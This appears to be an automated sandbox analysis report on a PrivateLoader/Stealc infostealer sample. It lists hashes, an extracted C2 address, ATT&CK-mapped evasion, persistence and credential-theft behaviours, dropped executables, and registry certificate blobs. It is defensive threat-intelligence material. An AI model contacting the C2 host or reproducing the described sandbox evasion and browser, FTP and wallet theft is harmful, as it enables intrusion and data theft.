privateloader | a45ae63ea9a20aecf8c1ae140824ed2f184d1777114ea4d604426bb6c0bff7cc

Analysis

max time kernel
148s
max time network
145s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
29-06-2024 19:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

archive/setup.exe
Size

792.5MB
MD5

ba080efe457d65936a33e95d834ca631
SHA1

38809c74840485a543ce6edfcfdc40edccc49363
SHA256

81fc1a37b9f0c25769846f121cfdd84bc3c11a03d6c32f021e133367f1e62980
SHA512

d1609c57e2a69e8871872543ddc22bbf9848a7537872ba335006c0936f0c39172ccf1b44ee1a1010e1791e952c2c682eea9a88ee396867658f5e3651885db470
SSDEEP

98304:vlEjneSvhKnC2P8Xscel5cIjAQrH5Lq1d2ITjeAWY/8J:tCZJKR8velaIjVq1d2oeBl

Score

10^/10

privateloader stealc default discovery evasion execution loader persistence spyware stealer

Malware Config

Extracted

Family

stealc

Botnet

default

http://85.28.47.4

Attributes

url_path
/920475a59bac849d.php

Signatures

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CFIECFIJDA.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2492	powershell.exe
2652	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CFIECFIJDA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CFIECFIJDA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\International\Geo\Nation	setup.exe

Executes dropped EXE 24 IoCs

pid	Process
2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe
1948	WP5Nq5GxZ5DdX9ZSLesFgf6D.exe
2800	w8VcQsjDmh1yU_gofgrWJrfe.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2832	iHZU061ECvv4QIP9wPjdodDB.exe
2740	5eKJaFRFmKEoBuRF04Qht3K2.exe
1068	oGahnUQ3rh3YlX0uwwfEFaVl.tmp
2344	Install.exe
2368	Install.exe
1200	Install.exe
2420	Install.exe
1696	vkfreeaudiosaver32_64.exe
2840	vkfreeaudiosaver32_64.exe
2320	H8Isy54p_ndScl17d9UwhXLY.exe
3060	CFIECFIJDA.exe
1636	explorti.exe
1948	a3599e8794.exe
480	Process not Found
672	eqtpkqwqodik.exe
1560	HCBFIJJECF.exe
1216	GIIDBGDAFH.exe
2700	JKJKJJDBKE.exe
2060	hHlFfRj.exe
820	HlFfRjm.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	CFIECFIJDA.exe
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	explorti.exe

Loads dropped DLL 56 IoCs

pid	Process
1988	setup.exe
1988	setup.exe
1988	setup.exe
1988	setup.exe
2800	w8VcQsjDmh1yU_gofgrWJrfe.exe
2800	w8VcQsjDmh1yU_gofgrWJrfe.exe
2800	w8VcQsjDmh1yU_gofgrWJrfe.exe
2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe
2740	5eKJaFRFmKEoBuRF04Qht3K2.exe
2740	5eKJaFRFmKEoBuRF04Qht3K2.exe
2740	5eKJaFRFmKEoBuRF04Qht3K2.exe
1068	oGahnUQ3rh3YlX0uwwfEFaVl.tmp
1068	oGahnUQ3rh3YlX0uwwfEFaVl.tmp
1068	oGahnUQ3rh3YlX0uwwfEFaVl.tmp
2800	w8VcQsjDmh1yU_gofgrWJrfe.exe
2344	Install.exe
2344	Install.exe
2344	Install.exe
2344	Install.exe
2368	Install.exe
2368	Install.exe
2368	Install.exe
2740	5eKJaFRFmKEoBuRF04Qht3K2.exe
1200	Install.exe
1200	Install.exe
1200	Install.exe
1200	Install.exe
1068	oGahnUQ3rh3YlX0uwwfEFaVl.tmp
2420	Install.exe
2420	Install.exe
2420	Install.exe
2832	iHZU061ECvv4QIP9wPjdodDB.exe
2832	iHZU061ECvv4QIP9wPjdodDB.exe
2968	cmd.exe
3060	CFIECFIJDA.exe
1636	explorti.exe
1636	explorti.exe
480	Process not Found
2220	MSBuild.exe
2220	MSBuild.exe
2220	MSBuild.exe
2220	MSBuild.exe
2736	WerFault.exe
2736	WerFault.exe
2736	WerFault.exe
2220	MSBuild.exe
2220	MSBuild.exe
2220	MSBuild.exe
2220	MSBuild.exe
2220	MSBuild.exe
2220	MSBuild.exe
2220	MSBuild.exe
2220	MSBuild.exe
2044	WerFault.exe
2044	WerFault.exe
2044	WerFault.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
20	bitbucket.org
29	bitbucket.org
40	bitbucket.org
59	bitbucket.org
106	iplogger.org
107	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	api.myip.com
5	api.myip.com
13	ipinfo.io
14	ipinfo.io

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1812	powercfg.exe
2360	powercfg.exe
684	powercfg.exe
2040	powercfg.exe
324	powercfg.exe
2384	powercfg.exe
2304	powercfg.exe
532	powercfg.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
2832	iHZU061ECvv4QIP9wPjdodDB.exe
2832	iHZU061ECvv4QIP9wPjdodDB.exe
3060	CFIECFIJDA.exe
1636	explorti.exe
1948	a3599e8794.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2320 set thread context of 2220	2320	H8Isy54p_ndScl17d9UwhXLY.exe	59
PID 672 set thread context of 572	672	eqtpkqwqodik.exe	94
PID 672 set thread context of 2240	672	eqtpkqwqodik.exe	97

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bBfKaGDnIKdTdJZScE.job	schtasks.exe
File created	C:\Windows\Tasks\explorti.job	CFIECFIJDA.exe
File created	C:\Windows\Tasks\bUVDAOPnPkUhchiViu.job	schtasks.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2440	sc.exe
2352	sc.exe
1400	sc.exe
1168	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2736	1560	WerFault.exe	100
2044	2700	WerFault.exe	104

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	iHZU061ECvv4QIP9wPjdodDB.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	iHZU061ECvv4QIP9wPjdodDB.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2040	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Modifies system certificate store 2 TTPs 19 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00